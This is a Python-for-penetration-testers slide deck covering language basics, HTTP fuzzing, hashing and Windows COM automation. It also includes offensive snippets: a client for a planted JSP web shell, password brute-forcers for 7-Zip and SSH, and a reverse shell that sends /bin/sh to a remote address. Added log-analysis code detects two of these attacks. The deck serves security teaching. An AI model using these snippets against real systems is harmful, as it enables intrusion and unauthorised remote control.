
Python for Penetration testers


Quick presentation on how a penetration tester can start using Python to automate many tasks, create new tools, etc. For my colleagues.


Page 1: Python for Penetration testers

Why?

• EASY (install, learn, code)
• Tons of libraries
• Code is easy to understand
• Multiplatform
• Good for prototyping


History

• Conceived in the late 80s, with the first implementation in 1989
• Created by Guido van Rossum
• Benevolent Dictator for Life
• Currently there are two branches: 2.x and 3.0


Python 101

• Interpreted language
• Object oriented
• Indentation is significant in Python: it is the block delimiter
• Usual control structures (if, while, etc.)
• Multiple levels of organization (functions, classes, modules, packages)


Who is using Python?

• ImmunityDebugger
• Peach
• Sulley
• Paimei
• Scapy
• Spike Proxy
• Core Impact
• Canvas
• W3AF
• Sqlmap
• Impacket
• Google


Python 101

Data types:

• Strings - "Hello"
• Numbers - 123
• Lists - ['hello', '2', '1']
• Tuples - ('1', '2', '3') (immutable)
• Dictionaries - d = {'key1': 'dog', 'key2': 'cat'}


Python 101

Structures:

    numbers = [1, 2, 3, 4, 5]

    for x in numbers:
        print x

    # x still holds the last element of the list here
    if 3 > x:
        print "3 is bigger than " + str(x)
    else:
        print "3 is smaller than " + str(x)


Python 101

Example Hello World:

    print "Hello World"

With variables:

    msg = "Hello World"
    print msg


Python 101

• Interactive Python shell
• Commands execute line by line as you type
• Good for testing small pieces of code such as loops, regexes, etc.
• Type "python" and press Enter to access the shell


Python 101

• String indexes start at 0 and can also be negative
• msg[0] is H
• msg[-1] is d


Basic Code bits

    import sys

    ofile = "names.txt"
    fil = open(ofile, 'r')  # read mode; 'w' would truncate the file
    x = fil.readlines()
    for y in x:
        print y


Urllib2

• Library to deal with HTTP

    import urllib2

    response = urllib2.urlopen('http://python.org/')
    html = response.read()
    print html


Basic fuzzer

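    import sys, urllib2

    ofile = "dirs.txt"
    fil = open(ofile, 'r')  # read mode: the word list already exists
    dirs = fil.readlines()

    for x in dirs:
        x = x.strip()  # drop the trailing newline before building the URL
        try:
            response = urllib2.urlopen('http://python.org/' + x)
            html = response.read()
        except urllib2.HTTPError, e:
            print x, e.code  # urlopen raises on 4xx/5xx responses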


Encoding

    import base64

    string = "TEST"
    base64.standard_b64encode(string)
    # 'VEVTVA=='

    import hashlib

    m = hashlib.new('md5')
    m.update(string)
    res = m.hexdigest()
    print res
    # 033bd94b1168d7e4f0d644c3c95e35bf


Generic Console for Web Remote Execution

    import httplib, urllib, sys

    host = "XXXXXXXXXX"

    while 1:
        cmd = raw_input("Exploited@" + host + "#>")
        if cmd == "exit":
            sys.exit()
        else:
            h = httplib.HTTP(host)
            cmd = urllib.quote(cmd)
            print cmd
            h.putrequest('GET', "/myconsole123/my-shell.jsp?pass=1231&cmd=" + cmd)
            h.putheader('Host', host)
            h.putheader('User-agent', 'Internet Explorer 6.0 ')
            h.endheaders()
            returncode, returnmsg, headers = h.getreply()
            response = h.getfile().read()
            print response
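The traffic this console produces is easy to spot in web server access logs. The following is an added example, not code from the original slides, written for Python 3 (the slides use Python 2); the parameter-name list, the extension list and the sample log lines are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

# Assumed heuristics; tune both for the applications you actually run.
CMD_PARAMS = {"cmd", "command", "exec"}
SCRIPT_EXT = (".jsp", ".php", ".asp", ".aspx")

def score_line(line):
    """Return (ip, path, reasons) for a suspicious request, or None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    url = urlsplit(m["target"])
    names = {k.lower() for k, _ in parse_qsl(url.query, keep_blank_values=True)}
    reasons = []
    hit = CMD_PARAMS & names
    if hit and url.path.lower().endswith(SCRIPT_EXT):
        reasons.append("command-like parameter: " + ",".join(sorted(hit)))
        # Browsers and common tools send "Product/version"; the slide's client does not.
        if not re.match(r"[A-Za-z][\w.-]*/\d", m["ua"]):
            reasons.append("user-agent lacks a product/version token")
    return (m["ip"], url.path, reasons) if reasons else None

def summarize(lines):
    """Group findings by (client, path) with a hit count and the distinct reasons."""
    out = defaultdict(lambda: {"hits": 0, "reasons": set()})
    for line in lines:
        found = score_line(line)
        if found:
            ip, path, reasons = found
            out[(ip, path)]["hits"] += 1
            out[(ip, path)]["reasons"].update(reasons)
    return dict(out)

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE = [
    '192.0.2.10 - - [10/Oct/2023:13:55:36 +0000] "GET /index.jsp?page=2 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /myconsole123/my-shell.jsp?pass=1231&cmd=id HTTP/1.0" 200 64 "-" "Internet Explorer 6.0 "',
    '198.51.100.7 - - [10/Oct/2023:13:56:09 +0000] "GET /myconsole123/my-shell.jsp?pass=1231&cmd=uname%20-a HTTP/1.0" 200 97 "-" "Internet Explorer 6.0 "',
    '192.0.2.10 - - [10/Oct/2023:13:57:12 +0000] "GET /search.jsp?q=cmd HTTP/1.1" 200 301 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    print(summarize(SAMPLE))
```

Only the parameter name is matched, so a search for the word "cmd" is not flagged, and the user-agent check is used as a supporting signal rather than on its own.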


7 Zip Cracker

    import os, sys, pylzma
    from py7zlib import Archive7z, NoPasswordGivenError, WrongPasswordError

    pas = open('passwords.txt', 'rb')
    password = pas.readlines()

    for x in password:
        x = x.strip()  # drop the trailing newline read from the word list
        try:
            fp = open('test.7z', 'rb')
            archive = Archive7z(fp, password=x)
            print "The password is " + x
            sys.exit()
        except Exception:
            fp.close()


A Web browser

    #!/usr/bin/env python
    import sys
    from PyQt4.QtCore import *
    from PyQt4.QtGui import *
    from PyQt4.QtWebKit import *

    app = QApplication(sys.argv)
    web = QWebView()
    web.load(QUrl("http://www.edge-security.com"))
    web.show()
    sys.exit(app.exec_())


One line Webserver

• python -m SimpleHTTPServer 8080


SSH Bruteforcer

    import paramiko

    # hostname, username and passw are set by the surrounding code (not shown on the slide)
    t = paramiko.Transport(hostname)
    try:
        t.start_client()
    except Exception:
        x = 0
    try:
        t.auth_password(username=username, password=passw)
    except Exception:
        x = 0
    if t.is_authenticated():
        print "Password found " + passw
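On the server side, each attempt made by a tool like this leaves a line in the sshd authentication log. The following is an added example, not code from the original slides, written for Python 3; it flags bursts of failed password logins per source address and marks a successful login that follows a burst. The threshold, the time window, the assumed year and the sample log lines are illustrative assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# OpenSSH sshd auth-log lines that report a password authentication result.
SSHD_RE = re.compile(
    r'^(?P<ts>\w{3} +\d+ [\d:]{8}) \S+ sshd\[\d+\]: '
    r'(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) '
    r'from (?P<ip>\S+) port \d+')

def parse(line, year=2000):
    """Return (time, ip, user, ok) or None; syslog omits the year, so one is assumed."""
    m = SSHD_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["ip"], m["user"], m["result"] == "Accepted"

def detect(lines, threshold=5, window=timedelta(minutes=1)):
    """Flag sources with >= threshold failures inside the window and record
    the account of any successful login that follows the burst."""
    fails = defaultdict(list)
    alerts = {}
    for ts, ip, user, ok in filter(None, map(parse, lines)):
        recent = [t for t in fails[ip] if ts - t <= window]
        if ok:
            if len(recent) >= threshold or ip in alerts:
                alerts[ip] = {"login_after_burst": user}
            continue
        recent.append(ts)
        fails[ip] = recent
        if len(recent) >= threshold:
            alerts.setdefault(ip, {"login_after_burst": None})
    return alerts

# Constructed sample (documentation addresses), not a real log.
SAMPLE = [f"Oct 10 13:55:{s:02d} host sshd[411]: Failed password for root "
          f"from 203.0.113.5 port 4242 ssh2" for s in range(10, 16)] + [
    "Oct 10 13:55:17 host sshd[411]: Accepted password for root from 203.0.113.5 port 4242 ssh2",
    "Oct 10 14:02:03 host sshd[502]: Failed password for alice from 192.0.2.20 port 5151 ssh2",
    "Oct 10 14:02:09 host sshd[502]: Accepted password for alice from 192.0.2.20 port 5151 ssh2",
]

if __name__ == "__main__":
    print(detect(SAMPLE))
```

A single mistyped password followed by a successful login, as in the last two sample lines, stays below the threshold and is not reported.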


Proxy Strike Deflate Patch

• pd contains the POST data in the repeat function:

    import zlib

    defla = zlib.compress(pd)


Reverse Shell

    import socket, subprocess, os

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("10.0.0.1", 1234))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    p = subprocess.call(["/bin/sh", "-i"])


Win32Com

• Library that allows us to access COM objects on Win32 systems
• We can automate Word, Excel, PowerPoint, access WMI, AD, etc.


Massive printing

    from win32com import client
    import time

    word = client.Dispatch("Word.Application")

    def printPDFDocument(filename):
        word.Documents.Open(filename)
        word.ActiveDocument.PrintOut()
        time.sleep(5)  # give Word time to spool the job before closing
        word.ActiveDocument.Close()

    printPDFDocument("c:\\test.doc")
    word.Quit()  # quit Word once, after the documents have been printed


Excel Processing

    from win32com.client import Dispatch

    xlApp = Dispatch("Excel.Application")
    xlApp.Visible = 1
    xlApp.Workbooks.Open("test.xls")

    # print column 5 of the first 99 rows of the active sheet
    for x in range(1, 100):
        nombre = str(xlApp.ActiveSheet.Cells(x, 5))
        print nombre

    xlApp.Quit()


WMI

    import wmi

    c = wmi.WMI()
    for process in c.Win32_Process():
        print process.ProcessId, process.Name


Interesting stuff

• http://dirk-loss.de/python-tools.htm
• http://code.activestate.com/recipes/langs/python/